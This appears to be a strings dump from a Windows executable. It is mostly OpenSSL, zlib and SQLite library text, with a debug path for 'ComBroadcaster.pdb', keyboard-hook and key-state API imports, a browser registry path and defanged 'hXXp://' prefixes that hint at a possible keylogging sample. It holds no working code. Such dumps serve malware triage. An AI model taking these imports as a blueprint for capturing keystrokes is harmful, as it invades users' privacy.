x509_pkey

%s(%d): OpenSSL internal error, assertion failed: %s

lhash part of OpenSSL 1.0.0e 6 Sep 2011

supportedAlgorithms

crossCertificatePair

certificateRevocationList

cACertificate

userCertificate

userPassword

supportedApplicationContext

Microsoft Local Key set

LocalKeySet

id-Gost28147-89-None-KeyMeshing

id-Gost28147-89-CryptoPro-KeyMeshing

password based MAC

id-PasswordBasedMAC

X509v3 Certificate Issuer

certificateIssuer

certicom-arc

Proxy Certificate Information

proxyCertInfo

Microsoft Smartcardlogin

msSmartcardLogin

joint-iso-itu-t

JOINT-ISO-ITU-T

set-rootKeyThumb

setAttr-Cert

setCext-cCertRequired

setCext-certType

setct-CertResTBE

setct-CertReqTBEX

setct-CertReqTBE

setct-AcqCardCodeMsgTBE

setct-CertInqReqTBS

setct-CertResData

setct-CertReqTBS

setct-CertReqData

setct-PCertResTBS

setct-PCertReqData

setct-AcqCardCodeMsg

certificate extensions

set-certExt

set-msgExt

id-ecPublicKey

id-cmc-confirmCertAcceptance

id-cmc-getCert

id-regInfo-certReq

id-regCtrl-protocolEncrKey

id-regCtrl-oldCertID

id-it-revPassphrase

id-it-keyPairParamRep

id-it-keyPairParamReq

id-it-unsupportedOIDs

id-it-caKeyUpdateInfo

id-it-encKeyPairTypes

id-it-signKeyPairTypes

id-it-caProtEncCert

id-mod-attribute-cert

id-mod-qualified-cert-93

id-mod-qualified-cert-88

id-smime-aa-ets-certCRLTimestamp

id-smime-aa-ets-certValues

id-smime-aa-ets-CertificateRefs

id-smime-aa-ets-otherSigCert

id-smime-aa-smimeEncryptCerts

id-smime-aa-signingCertificate

id-smime-aa-encrypKeyPref

id-smime-aa-msgSigDigest

id-smime-ct-publishCert

id-smime-mod-msg-v3

sdsiCertificate

x509Certificate

localKeyID

certBag

pkcs8ShroudedKeyBag

keyBag

pbeWithSHA1And2-KeyTripleDES-CBC

pbeWithSHA1And3-KeyTripleDES-CBC

TLS Web Client Authentication

TLS Web Server Authentication

X509v3 Extended Key Usage

extendedKeyUsage

X509v3 Authority Key Identifier

authorityKeyIdentifier

X509v3 Certificate Policies

certificatePolicies

X509v3 Private Key Usage Period

privateKeyUsagePeriod

X509v3 Key Usage

keyUsage

X509v3 Subject Key Identifier

subjectKeyIdentifier

Netscape Certificate Sequence

nsCertSequence

Netscape CA Policy Url

nsCaPolicyUrl

Netscape Renewal Url

nsRenewalUrl

Netscape CA Revocation Url

nsCaRevocationUrl

Netscape Revocation Url

nsRevocationUrl

Netscape Base Url

nsBaseUrl

Netscape Cert Type

nsCertType

Netscape Certificate Extension

nsCertExt

extendedCertificateAttributes

challengePassword

dhKeyAgreement

TRUSTED CERTIFICATE

CERTIFICATE REQUEST

NEW CERTIFICATE REQUEST

RSA PRIVATE KEY

DSA PRIVATE KEY

EC PRIVATE KEY

X509 CERTIFICATE

/usr/local/ssl/certs

/usr/local/ssl/cert.pem

SSL_CERT_DIR

SSL_CERT_FILE

RSA part of OpenSSL 1.0.0e 6 Sep 2011

DSA part of OpenSSL 1.0.0e 6 Sep 2011

.\crypto\ec\ec_key.c

Diffie-Hellman part of OpenSSL 1.0.0e 6 Sep 2011

value.single

value.set

X509_PUBKEY

public_key

.\crypto\asn1\x_pubkey.c

%d.%d.%d.%d/%d.%d.%d.%d

ddddddZ

ddddddZ

<ASN1 %d>

appl [ %d ]

cont [ %d ]

priv [ %d ]

'() ,-./:=?

name.relativename

name.fullname

certificateHold

Certificate Hold

cessationOfOperation

Cessation Of Operation

keyCompromise

Key Compromise

%*sOnly Attribute Certificates

%*sOnly CA Certificates

%*sOnly User Certificates

PROXY_CERT_INFO_EXTENSION

PEM part of OpenSSL 1.0.0e 6 Sep 2011

phrase is too short, needs to be at least %d chars

Enter PEM pass phrase:

PRIVATE KEY

ENCRYPTED PRIVATE KEY

ANY PRIVATE KEY

AUTHORITY_KEYID

keyid

X509_CERT_PAIR

X509_CERT_AUX

%lu:%s:%s:%d:%s

%sx - <SPACES/NULS>

x -

USER32.DLL

NETAPI32.DLL

KERNEL32.DLL

ADVAPI32.DLL

keylen <= sizeof key

EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)

pubkey

enc_key

key_enc_algor

cert

d.encrypted

d.digest

d.signed_and_enveloped

d.enveloped

d.sign

d.data

d.other

EC_PRIVATEKEY

publicKey

privateKey

value.implicitlyCA

value.parameters

value.named_curve

p.char_two

p.prime

p.ppBasis

p.tpBasis

p.onBasis

p.other

PKCS8_PRIV_KEY_INFO

pkey

pkeyalg

.\crypto\evp\evp_pkey.c

NETSCAPE_CERT_SEQUENCE

certs

.\crypto\pem\pem_pkey.c

.\crypto\asn1\x_pkey.c

EC part of OpenSSL 1.0.0e 6 Sep 2011

.\crypto\dh\dh_key.c

%s: (%d bit)

Public-Key

Private-Key

recommended-private-length: %d bits

public-key:

private-key:

PKCS#3 DH Public-Key

PKCS#3 DH Private-Key

Public-Key: (%d bit)

Private-Key: (%d bit)

SHA1 part of OpenSSL 1.0.0e 6 Sep 2011

SHA-256 part of OpenSSL 1.0.0e 6 Sep 2011

SHA-512 part of OpenSSL 1.0.0e 6 Sep 2011

<unsupported>

IP Address:%d.%d.%d.%d

URI:%s

DNS:%s

email:%s

EdiPartyName:<unsupported>

X400Name:<unsupported>

othername:<unsupported>

.\crypto\evp\evp_key.c

nkey <= EVP_MAX_KEY_LENGTH

EVP part of OpenSSL 1.0.0e 6 Sep 2011

?456789:;<=

!"#$%&'()* ,-./0123

d.usernotice

d.cpsuri

CERTIFICATEPOLICIES

%*sExplicit Text: %s

%*sNumber%s:

%*sOrganization: %s

%*sCPS: %s

%*sPolicy Text: %s

%*scrlUrl:

EXTENDED_KEY_USAGE

%*sZone: %s, User:

.\crypto\x509v3\v3_akey.c

PKEY_USAGE_PERIOD

keyCertSign

Certificate Sign

keyAgreement

Key Agreement

keyEncipherment

Key Encipherment

.\crypto\x509v3\v3_skey.c

RIPE-MD160 part of OpenSSL 1.0.0e 6 Sep 2011

SHA part of OpenSSL 1.0.0e 6 Sep 2011

CAST part of OpenSSL 1.0.0e 6 Sep 2011

Blowfish part of OpenSSL 1.0.0e 6 Sep 2011

RC2 part of OpenSSL 1.0.0e 6 Sep 2011

.pp@0

aEÐ

 (#EÚ

ÚE<<0

IDEA part of OpenSSL 1.0.0e 6 Sep 2011

len>=0 && len<=(int)sizeof(ctx->key)

j <= (int)sizeof(ctx->key)

keylength

keyfunc

.\crypto\pkcs12\p12_key.c

ECDSA part of OpenSSL 1.0.0e 6 Sep 2011

Basis Type: %s

Field Type: %s

ASN1 OID: %s

%s %s%lu (%s0x%lx)

hexkey

rsa_keygen_pubexp

rsa_keygen_bits

CONF part of OpenSSL 1.0.0e 6 Sep 2011

crlUrl

certStatus

certId

OCSP_CERTSTATUS

value.unknown

value.revoked

value.good

value.byKey

value.byName

reqCert

OCSP_CERTID

issuerKeyHash

%'%1$=%C%K%O%s%

.%.-.3.7.9.?.W.[.o.y.

C%C'C3C7C9COCWCiC

d.receiptList

d.allOrFirstTier

d.compressedData

d.authenticatedData

d.encryptedData

d.digestedData

d.envelopedData

d.signedData

d.ori

d.pwri

d.kekri

d.kari

d.ktri

CMS_PasswordRecipientInfo

keyDerivationAlgorithm

keyIdentifier

CMS_KeyAgreeRecipientInfo

recipientEncryptedKeys

CMS_OriginatorIdentifierOrKey

d.originatorKey

CMS_OriginatorPublicKey

CMS_RecipientEncryptedKey

CMS_KeyAgreeRecipientIdentifier

d.rKeyId

CMS_RecipientKeyIdentifier

CMS_OtherKeyAttribute

keyAttr

keyAttrId

CMS_KeyTransRecipientInfo

encryptedKey

keyEncryptionAlgorithm

certificates

d.crl

d.subjectKeyIdentifier

d.issuerAndSerialNumber

CMS_CertificateChoices

d.v2AttrCert

d.v1AttrCert

d.extendedCertificate

d.certificate

CMS_OtherCertificateFormat

otherCert

otherCertFormat

CONF_def part of OpenSSL 1.0.0e 6 Sep 2011

[[%s]]

[%s] %s=%s

Verifying - %s

value.bag

value.safes

value.shkeybag

value.keybag

value.sdsicert

value.x509cert

value.other

ECDH part of OpenSSL 1.0.0e 6 Sep 2011

%s.dll

%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s

EXPORT56

EXPORT40

EXPORT

wrong number of key bits

unsupported status type

unsupported ssl version

unsupported protocol

unsupported elliptic curve

unsupported digest type

unsupported compression algorithm

unsupported cipher

unknown pkey type

unknown key exchange type

unknown certificate type

unable to find public key parameters

unable to extract public key

unable to decode ecdh certs

unable to decode dh certs

tried to use unsupported cipher

tls peer did not respond with certificate list

tls client cert req with anon cipher

tlsv1 unsupported extension

tlsv1 certificate unobtainable

tlsv1 bad certificate status response

tlsv1 bad certificate hash value

tlsv1 alert export restriction

sslv3 alert unsupported certificate

sslv3 alert no certificate

sslv3 alert certificate unknown

sslv3 alert certificate revoked

sslv3 alert certificate expired

sslv3 alert bad certificate

signature for non signing certificate

reuse cert type not zero

reuse cert length not zero

public key not rsa

public key is not rsa

public key encrypt error

peer error unsupported certificate type

peer error no certificate

peer error certificate

peer did not return a certificate

null ssl method passed

no publickey

no private key assigned

no privatekey

Peer haven't sent GOST certificate, required for selected ciphersuite

no client cert received

no client cert method

no ciphers passed

no certificate specified

no certificate set

no certificate returned

no certificate assigned

no certificates returned

missing tmp rsa pkey

missing tmp rsa key

missing tmp ecdh key

missing tmp dh key

missing rsa signing cert

missing rsa encrypting cert

missing rsa certificate

missing export tmp rsa key

missing export tmp dh key

missing dsa signing cert

missing dh rsa cert

missing dh key

missing dh dsa cert

krb5 server rd_req (keytab perms?)

key arg too long

invalid ticket keys length

http request

https proxy request

error generating tmp rsa key

ecc cert should have sha1 signature

ecc cert should have rsa signature

ecc cert not for signing

ecc cert not for key agreement

cert length mismatch

certificate verify failed

bad ecc cert

bad dh pub key length

TLS1_SETUP_KEY_BLOCK

tls1_cert_verify_mac

SSL_VERIFY_CERT_CHAIN

SSL_use_RSAPrivateKey_file

SSL_use_RSAPrivateKey_ASN1

SSL_use_RSAPrivateKey

SSL_use_PrivateKey_file

SSL_use_PrivateKey_ASN1

SSL_use_PrivateKey

SSL_use_certificate_file

SSL_use_certificate_ASN1

SSL_use_certificate

SSL_SET_PKEY

SSL_SET_CERT

SSL_SESS_CERT_NEW

SSL_GET_SIGN_PKEY

SSL_GET_SERVER_SEND_CERT

SSL_CTX_use_RSAPrivateKey_file

SSL_CTX_use_RSAPrivateKey_ASN1

SSL_CTX_use_RSAPrivateKey

SSL_CTX_use_PrivateKey_file

SSL_CTX_use_PrivateKey_ASN1

SSL_CTX_use_PrivateKey

SSL_CTX_use_certificate_file

SSL_CTX_use_certificate_chain_file

SSL_CTX_use_certificate_ASN1

SSL_CTX_use_certificate

SSL_CTX_set_client_cert_engine

SSL_CTX_check_private_key

SSL_CHECK_SRVR_ECC_CERT_AND_ALG

SSL_check_private_key

SSL_CERT_NEW

SSL_CERT_INSTANTIATE

SSL_CERT_INST

SSL_CERT_DUP

SSL_add_file_cert_subjects_to_stack

SSL_add_dir_cert_subjects_to_stack

SSL3_SETUP_KEY_BLOCK

SSL3_SEND_SERVER_KEY_EXCHANGE

SSL3_SEND_SERVER_CERTIFICATE

SSL3_SEND_CLIENT_KEY_EXCHANGE

SSL3_SEND_CLIENT_CERTIFICATE

SSL3_SEND_CERTIFICATE_REQUEST

SSL3_OUTPUT_CERT_CHAIN

SSL3_GET_SERVER_CERTIFICATE

SSL3_GET_KEY_EXCHANGE

SSL3_GET_CLIENT_KEY_EXCHANGE

SSL3_GET_CLIENT_CERTIFICATE

SSL3_GET_CERT_VERIFY

SSL3_GET_CERT_STATUS

SSL3_GET_CERTIFICATE_REQUEST

SSL3_GENERATE_KEY_BLOCK

SSL3_CHECK_CERT_AND_ALGORITHM

SSL3_ADD_CERT_TO_BUF

SSL2_SET_CERTIFICATE

SSL2_GENERATE_KEY_MATERIAL

REQUEST_CERTIFICATE

GET_CLIENT_MASTER_KEY

DTLS1_SEND_SERVER_KEY_EXCHANGE

DTLS1_SEND_SERVER_CERTIFICATE

DTLS1_SEND_CLIENT_KEY_EXCHANGE

DTLS1_SEND_CLIENT_CERTIFICATE

DTLS1_SEND_CERTIFICATE_REQUEST

DTLS1_OUTPUT_CERT_CHAIN

DTLS1_ADD_CERT_TO_BUF

CLIENT_MASTER_KEY

CLIENT_CERTIFICATE

.\ssl\ssl_cert.c

TLSv1 part of OpenSSL 1.0.0e 6 Sep 2011

SSLv3 part of OpenSSL 1.0.0e 6 Sep 2011

SSLv2 part of OpenSSL 1.0.0e 6 Sep 2011

s->session->master_key_length >= 0 && s->session->master_key_length < (int)sizeof(s->session->master_key)

c->iv_len <= (int)sizeof(s->session->key_arg)

s->s2->key_material_length <= sizeof s->s2->key_material

key expansion

client write key

server write key

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

.\crypto\engine\eng_pkey.c

unsupported type

unsupported recpientinfo type

unsupported recipient type

unsupported kek algorithm

unsupported content type

signer certificate not found

private key does not match certificate

no public key

no private key

no msgsigdigest

no key or cert

no key

not supported for this key type

not key transport

msgsigdigest wrong length

msgsigdigest verification failure

msgsigdigest error

invalid key length

invalid encrypted key length

error setting key

error getting public key

certificate verify error

certificate has no keyid

certificate already present

CMS_SIGNERINFO_VERIFY_CERT

CMS_RecipientInfo_set0_pkey

CMS_RecipientInfo_set0_key

CMS_RecipientInfo_ktri_cert_cmp

cms_msgSigDigest_add1

CMS_GET0_CERTIFICATE_CHOICES

CMS_EncryptedData_set1_key

CMS_decrypt_set1_pkey

CMS_decrypt_set1_key

CMS_add1_recipient_cert

CMS_add0_recipient_key

CMS_add0_cert

unsupported requestorname type

no certificates in chain

error parsing url

PARSE_HTTP_LINE1

OCSP_parse_url

OCSP_cert_id_new

unimplemented public key method

invalid cmd number

invalid cmd name

failed loading public key

failed loading private key

cmd not executable

ENGINE_UNLOAD_KEY

ENGINE_load_ssl_client_cert

ENGINE_load_public_key

ENGINE_load_private_key

ENGINE_get_pkey_meth

ENGINE_get_pkey_asn1_meth

ENGINE_ctrl_cmd_string

ENGINE_ctrl_cmd

ENGINE_cmd_is_executable

unsupported version

unsupported md algorithm

invalid signer certificate purpose

ess signing certificate error

ess add signing cert error

TS_VERIFY_CERT

TS_TST_INFO_set_msg_imprint

TS_RESP_CTX_set_signer_cert

TS_RESP_CTX_set_certs

TS_REQ_set_msg_imprint

TS_MSG_IMPRINT_set_algo

TS_CHECK_SIGNING_CERTS

ESS_SIGNING_CERT_NEW_INIT

ESS_CERT_ID_NEW_INIT

ESS_ADD_SIGNING_CERT

functionality not supported

WIN32_JOINER

unsupported pkcs12 mode

key gen error

PKCS8_add_keyusage

PKCS12_PBE_keyivgen

PKCS12_newpass

PKCS12_MAKE_SHKEYBAG

PKCS12_MAKE_KEYBAG

PKCS12_key_gen_uni

PKCS12_key_gen_asc

PKCS12_add_localkeyid

unsupported option

unable to get issuer keyid

policy syntax not currently supported

operation not defined

no proxy cert policy language defined

no issuer certificate

extension setting not supported

V2I_EXTENDED_KEY_USAGE

V2I_AUTHORITY_KEYID

S2I_SKEY_ID

S2I_ASN1_SKEY_ID

R2I_CERTPOL

unsupported cipher type

unknown operation

unable to find certificate

signing not supported for this key type

operation not supported on this type

no recipient matches key

no recipient matches certificate

encryption not supported for this key type

decrypted key is wrong length

PKCS7_add_certificate

unsupported method

no port specified

no port defined

no accept port specified

broken pipe

BIO_get_port

ECDH_compute_key

data too large for key size

unsupported field

passed null parameter

not a supported NIST prime

missing private key

keys not set

invalid private key

PKEY_EC_SIGN

PKEY_EC_PARAMGEN

PKEY_EC_KEYGEN

PKEY_EC_DERIVE

PKEY_EC_CTRL_STR

PKEY_EC_CTRL

o2i_ECPublicKey

i2o_ECPublicKey

i2d_ECPrivateKey

EC_KEY_print_fp

EC_KEY_print

EC_KEY_new

EC_KEY_generate_key

EC_KEY_copy

EC_KEY_check_key

ECKEY_TYPE2PARAM

ECKEY_PUB_ENCODE

ECKEY_PUB_DECODE

ECKEY_PRIV_ENCODE

ECKEY_PRIV_DECODE

ECKEY_PARAM_DECODE

ECKEY_PARAM2TYPE

DO_EC_KEY_PRINT

d2i_ECPrivateKey

zlib not supported

wrong public key type

unsupported public key type

unsupported encryption algorithm

unsupported any defined by type

unknown public key type

unable to decode rsa private key

unable to decode rsa key

streaming not supported

private key header missing

digest and key type not supported

bad password read

X509_PKEY_new

i2d_RSA_PUBKEY

i2d_PublicKey

i2d_PrivateKey

i2d_EC_PUBKEY

i2d_DSA_PUBKEY

d2i_X509_PKEY

d2i_PublicKey

d2i_PrivateKey

d2i_AutoPrivateKey

unsupported algorithm

unknown key type

unable to get certs public key

public key encode error

public key decode error

no cert set for us to verify

method not supported

loading cert dir

key values mismatch

key type mismatch

cert already in hash table

cant check dh key

X509_verify_cert

X509_STORE_add_cert

X509_REQ_check_private_key

X509_PUBKEY_set

X509_PUBKEY_get

X509_load_cert_file

X509_load_cert_crl_file

X509_get_pubkey_parameters

X509_check_private_key

GET_CERT_BY_SUBJECT

ADD_CERT_DIR

PKEY_DSA_KEYGEN

PKEY_DSA_CTRL

unsupported key components

unsupported encryption

read key

public key no rsa

problems getting password

keyblob too short

keyblob header parse error

expecting public key blob

expecting private key blob

error converting private key

PEM_WRITE_PRIVATEKEY

PEM_READ_PRIVATEKEY

PEM_READ_BIO_PRIVATEKEY

PEM_PK8PKEY

PEM_F_PEM_WRITE_PKCS8PRIVATEKEY

DO_PK8PKEY_FP

DO_PK8PKEY

d2i_PKCS8PrivateKey_fp

d2i_PKCS8PrivateKey_bio

unsupported salt type

unsupported private key algorithm

unsupported prf

unsupported key size

unsupported key derivation function

unsupported keylength

unsuported number of rounds

private key encode error

private key decode error

operaton not initialized

operation not supported for this keytype

no operation set

no key set

keygen failure

invalid operation

expecting a ec key

expecting a ecdsa key

expecting a dsa key

expecting a dh key

expecting an rsa key

different key types

ctrl operation not implemented

command not supported

camellia key setup failed

bn pubkey error

bad key length

aes key setup failed

PKEY_SET_TYPE

PKCS5_v2_PBE_keyivgen

PKCS5_PBE_keyivgen

EVP_PKEY_verify_recover_init

EVP_PKEY_verify_recover

EVP_PKEY_verify_init

EVP_PKEY_verify

EVP_PKEY_sign_init

EVP_PKEY_sign

EVP_PKEY_paramgen_init

EVP_PKEY_paramgen

EVP_PKEY_new

EVP_PKEY_keygen_init

EVP_PKEY_keygen

EVP_PKEY_get1_RSA

EVP_PKEY_get1_EC_KEY

EVP_PKEY_GET1_ECDSA

EVP_PKEY_get1_DSA

EVP_PKEY_get1_DH

EVP_PKEY_encrypt_old

EVP_PKEY_encrypt_init

EVP_PKEY_encrypt

EVP_PKEY_derive_set_peer

EVP_PKEY_derive_init

EVP_PKEY_derive

EVP_PKEY_decrypt_old

EVP_PKEY_decrypt_init

EVP_PKEY_decrypt

EVP_PKEY_CTX_dup

EVP_PKEY_CTX_ctrl_str

EVP_PKEY_CTX_ctrl

EVP_PKEY_copy_parameters

EVP_PKEY2PKCS8_broken

EVP_PKCS82PKEY_BROKEN

EVP_PKCS82PKEY

EVP_CIPHER_CTX_set_key_length

ECKEY_PKEY2PKCS8

ECDSA_PKEY2PKCS8

DSA_PKEY2PKCS8

DSAPKEY2PKCS8

D2I_PKEY

CAMELLIA_INIT_KEY

AES_INIT_KEY

invalid public key

PKEY_DH_KEYGEN

PKEY_DH_DERIVE

GENERATE_KEY

COMPUTE_KEY

rsa operations not supported

key size too small

invalid keybits

illegal or unsupported padding mode

digest too big for rsa key

data too small for key size

RSA_generate_key

RSA_check_key

RSA_BUILTIN_KEYGEN

PKEY_RSA_VERIFYRECOVER

PKEY_RSA_SIGN

PKEY_RSA_CTRL_STR

PKEY_RSA_CTRL

Load certs from files in a directory

%s%clx.%s%d

inflate 1.2.5 Copyright 1995-2010 Mark Adler

code %d bits %d->%d

gen_codes: max_code %d

bl code -

opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u

last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)

inflate 1.1.3 Copyright 1995-1998 Mark Adler

-1.1.3

1.1.3

3.7.8

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYtag handle with no suffix

illegal map key

key not found

expected key token

unexpected key token

tag:yaml.org,2002:

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

Software\Classes\.html

debug.txt

!"#$%&'()* ,-./:;<=>?@[\]^_`{|}~

Error %d: Could not begin update of %s

Error %d: Updating resource

hXXp://

hXXps://

,[]{}#&*!|>'"%@`

?,[]{}#&*!|>'"%@`

#;/?:@&= $,_.!~*'()[]

#;/?:@&= $_.~*'

?:,]}%@`

C:\Users\Ghassen\Downloads\Archive-c7a4\cmb010\cmb010\cmb01\cmb\Release\ComBroadcaster.pdb

SHELL32.dll

RPCRT4.dll

GetWindowsDirectoryW

GetCPInfo

PeekNamedPipe

GetProcessHeap

KERNEL32.dll

EnumChildWindows

EnumWindows

UnhookWindowsHookEx

GetKeyState

SetWindowsHookExW

MapVirtualKeyW

GetAsyncKeyState

CreateDialogIndirectParamW

GetKeyboardLayout

GetKeyboardState

GetKeyNameTextW

MapVirtualKeyExW

USER32.dll

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportOrgEx

GDI32.dll

WINSPOOL.DRV

COMDLG32.dll

RegOpenKeyExW

RegCloseKey

RegOpenKeyExA

RegCreateKeyExW

RegDeleteKeyW

RegEnumKeyExW

ADVAPI32.dll

ShellExecuteW

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

MSIMG32.dll

COMCTL32.dll

OLEACC.dll

GdiplusShutdown

gdiplus.dll

IMM32.dll

SHFileOperationW

VERSION.dll

WS2_32.dll

WINMM.dll

WLDAP32.dll

ReportEventA

.?AUDWebBrowserEvents2@@

.PAVCException@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCObject@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.PAVCOleException@@

.?AVCCmdTarget@@

.PAVCArchiveException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCFileException@@

.?AVCMDITabProxyWnd@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWnd@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWnd@@

.?AVCMFCToolBarCmdUI@@

.?AVCMFCAcceleratorKey@@

.?AVCMFCColorBarCmdUI@@

.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AVCMDIClientAreaWnd@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCCmdUsageCount@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@

.?AVCMFCRibbonKeyTip@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

zcÁ

.?AV?$CAtlExeModuleT@VCDummyModule@@@ATL@@

SQLITE_

d-d-d d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

RowKey

OsError 0x%x (%u)

os_win.c:%d: (%d) %s(%s) - %s

delayed %dms for lock/sharing conflict

%s-shm

%s\etilqs_

Recovered %d frames from WAL file %s

cannot limit WAL size: %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

unknown database %s

keyinfo(%d

%s(%d)

%s-mjX

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open value of type %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

EXECUTE %s%s SUBQUERY %d

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

sqlite_rename_table

sqlite_rename_trigger

sqlite_rename_parent

%s OR name=%Q

type='trigger' AND (%s)

sqlite_

table %s may not be altered

there is already another table or index with this name: %s

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

Cannot add a PRIMARY KEY column

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

sqlite_stat1

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE %s=%Q

SELECT tbl, idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

sqlite_detach

sqlite_attach

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

CREATE %s %.*s

CREATE TABLE %Q.sqlite_sequence(name,seq)

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

sqlite_stat2

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q AND type='index'

a JOIN clause is required before %s

unable to identify the object to be reindexed

table %s may not be modified

cannot modify %s because it is a view

sqlite_version

sqlite_source_id

sqlite_log

sqlite_compileoption_used

sqlite_compileoption_get

foreign key mismatch

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_keys

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

